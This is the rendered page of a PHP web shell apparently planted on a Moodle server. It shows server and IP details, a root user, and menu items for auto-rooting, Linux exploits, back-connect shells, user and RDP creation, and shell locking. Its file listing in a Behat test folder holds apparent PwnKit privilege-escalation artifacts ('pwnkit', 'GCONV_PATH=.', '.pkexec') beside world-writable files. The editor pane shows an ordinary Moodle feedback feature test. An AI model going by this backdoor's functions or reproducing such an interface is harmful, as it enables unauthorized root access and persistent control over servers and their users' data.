Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
mod /
feedback /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
anonymous.feature
11.69
KB
-rwxrwxrwx
behat_mod_feedback.php
9.98
KB
-rwxrwxrwx
coursemapping.feature
11.22
KB
-rwxrwxrwx
export_import.feature
6.46
KB
-rwxrwxrwx
feedback_no_calendar_capabilit...
1.85
KB
-rwxrwxrwx
groups.feature
13
KB
-rwxrwxrwx
multichoice.feature
21.1
KB
-rwxrwxrwx
multipleattempt.feature
2.46
KB
-rwxrwxrwx
non_anonymous.feature
7.09
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
question_types.feature
6.89
KB
-rwxrwxrwx
question_types_non_anon.featur...
7.21
KB
-rwxrwxrwx
show_nonrespondents.feature
2.79
KB
-rwxrwxrwx
templates.feature
8.64
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : non_anonymous.feature
@mod @mod_feedback Feature: Non anonymous feedback In order to collect feedbacks As an teacher I need to be able to create and collect feedbacks Background: Given the following "users" exist: | username | firstname | lastname | | user1 | Username | 1 | | user2 | Username | 2 | | teacher | Teacher | 3 | | manager | Manager | 4 | And the following "courses" exist: | fullname | shortname | | Course 1 | C1 | And the following "course enrolments" exist: | user | course | role | | user1 | C1 | student | | user2 | C1 | student | | teacher | C1 | editingteacher | And the following "system role assigns" exist: | user | course | role | | manager | Acceptance test site | manager | And the following "activities" exist: | activity | name | course | idnumber | anonymous | publish_stats | section | | feedback | Site feedback | Acceptance test site | feedback0 | 2 | 1 | 1 | | feedback | Course feedback | C1 | feedback1 | 2 | 1 | 0 | When I log in as "manager" And I am on site homepage And I follow "Site feedback" And I click on "Edit questions" "link" in the "[role=main]" "css_element" And I add a "Multiple choice" question to the feedback with: | Question | Do you like our site? | | Label | multichoice2 | | Multiple choice type | Multiple choice - single answer | | Hide the "Not selected" option | Yes | | Multiple choice values | Yes of course\nNot at all\nI don't know | And I log out Scenario: Guests can see non anonymous feedback on front page but can not complete When I follow "Site feedback" Then I should not see "Answer the questions" And I follow "Preview" And I should see "Do you like our site?" And I press "Continue" Scenario: Complete non anonymous feedback on the front page as an authenticated user And I log in as "user1" And I am on site homepage And I follow "Site feedback" And I follow "Preview" And I should see "Do you like our site?" And I press "Continue" And I follow "Answer the questions" And I should see "Do you like our site?" And I set the following fields to these values: | Yes of course | 1 | And I press "Submit your answers" And I should not see "Submitted answers" And I press "Continue" @javascript Scenario: Complete non anonymous feedback and view analysis on the front page as an authenticated user Given the following "role capability" exists: | role | frontpage | | mod/feedback:viewanalysepage | allow | When I am on the "Site feedback" "feedback activity" page logged in as user1 And I follow "Answer the questions" And I should see "Do you like our site?" And I set the following fields to these values: | Yes of course | 1 | And I press "Submit your answers" And I log out And I log in as "user2" And I am on site homepage When I follow "Site feedback" And I follow "Answer the questions" And I set the following fields to these values: | Not at all | 1 | And I press "Submit your answers" And I follow "Submitted answers" And I should see "Submitted answers: 2" And I should see "Questions: 1" # And I should not see "multichoice2" # TODO MDL-29303 do not show labels to users who can not edit feedback And I show chart data for the "multichoice2" feedback And I should see "Do you like our site?" And I should see "1 (50.00 %)" in the "Yes of course" "table_row" And I should see "1 (50.00 %)" in the "Not at all" "table_row" And I should not see "Show responses" And I log out And I log in as "manager" And I am on site homepage And I follow "Site feedback" And I navigate to "Show responses" in current page administration And I should see "Username" And I should see "Non anonymous entries (2)" And I should not see "Anonymous entries" And I click on "," "link" in the "Username 1" "table_row" And I should see "(Username 1)" And I should see "Yes of course" And I follow "Back" And I log out @javascript Scenario: Non anonymous feedback in a course When I am on the "Course feedback" "feedback activity" page logged in as teacher And I click on "Edit questions" "link" in the "[role=main]" "css_element" And I add a "Multiple choice" question to the feedback with: | Question | Do you like this course? | | Label | multichoice1 | | Multiple choice type | Multiple choice - single answer | | Hide the "Not selected" option | Yes | | Multiple choice values | Yes of course\nNot at all\nI don't know | And I log out When I am on the "Course feedback" "feedback activity" page logged in as user1 And I follow "Answer the questions" And I should see "Do you like this course?" And I set the following fields to these values: | Yes of course | 1 | And I press "Submit your answers" And I log out When I am on the "Course feedback" "feedback activity" page logged in as user2 And I follow "Answer the questions" And I should see "Do you like this course?" And I set the following fields to these values: | Not at all | 1 | And I press "Submit your answers" And I follow "Submitted answers" And I should see "Submitted answers: 2" And I should see "Questions: 1" # And I should not see "multichoice2" # TODO MDL-29303 And I show chart data for the "multichoice1" feedback And I should see "Do you like this course?" And I should see "1 (50.00 %)" in the "Yes of course" "table_row" And I should see "1 (50.00 %)" in the "Not at all" "table_row" And I log out When I am on the "Course feedback" "feedback activity" page logged in as teacher And I follow "Preview" And I should see "Do you like this course?" And I press "Continue" And I should not see "Answer the questions" And I navigate to "Show responses" in current page administration And I should see "Non anonymous entries (2)" And I should not see "Anonymous" And I click on "," "link" in the "Username 1" "table_row" And I should see "(Username 1)" And I should see "Yes of course" And I should not see "Prev" And I follow "Next" And I should see "(Username 2)" And I should not see "Next" And I should see "Prev" And I click on "Back" "link" in the "region-main" "region" # Delete non anonymous response And I click on "Delete entry" "link" in the "Username 1" "table_row" And I press "Yes" And I should see "Non anonymous entries (1)" And I should not see "Username 1" And I should see "Username 2"
Close